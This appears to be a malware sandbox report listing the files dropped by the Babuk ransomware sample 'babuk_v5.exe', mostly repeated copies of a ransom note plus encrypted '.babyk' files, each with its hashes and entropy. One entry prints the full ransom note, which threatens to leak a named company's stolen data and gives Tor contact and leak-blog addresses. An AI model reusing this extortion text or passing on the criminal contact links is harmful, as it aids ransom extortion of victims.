                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.605431578145514
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlGlcy044Y4FHyULo1iucDPVXnUqDhGOQ0QigTx16fXr75MRWR8l/8LUxNvEEn:S04PQk1NcxXz9AigTA7+8y/8L0vtn
                                                                            MD5:1ACE362A1C43D5E35ABE868820C1443F
                                                                            SHA1:0E104CE6B835B873FE5364A400A7A1E0BDD6FB5B
                                                                            SHA-256:531C753CF9D744E3A4138B8205A264115735A22F7F306ECF1E7A4953B50AFA88
                                                                            SHA-512:BB9432AA62485E70A5A088598B6A82DEEA04E1DAD5EC48D467FBBFC37093949F19F0DE91B37629870034EBC77CEA5E527DEA69142B9EE4EF54DB5AA9BE640C3B
                                                                            Malicious:false
                                                                            Preview: ........PV...'...]...x...#........B....;.P......9f*....W....O.Dc..3v...Q..G..P.(.k.K.p_.TXC....3.Lr.S..............,2.o...`......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.9822719054544935
                                                                            Encrypted:false
                                                                            SSDEEP:192:9bkC+wO8/ar2QJZV5hbbTLLXl5DMzIJeI3WpnO5W2b:SC1/Pe5hb/nT93WlEb
                                                                            MD5:ACF71FE4929C43E3B2E34368C106C7AA
                                                                            SHA1:40097D2948C3BAB9F1708F72462731943666CA85
                                                                            SHA-256:FCB0814ABB64FFE0D370B6B656B6B320FCB8B904BEA0306801915A1B4F1FDD78
                                                                            SHA-512:2159609FFD66C0C93733B615EA7540BC247B7165C3FC77D1577D797F2998B4A5989987C09CB9E8A06C101A8AAEAEEF0F1B908BBE45751043860B00B3DA0F35DC
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
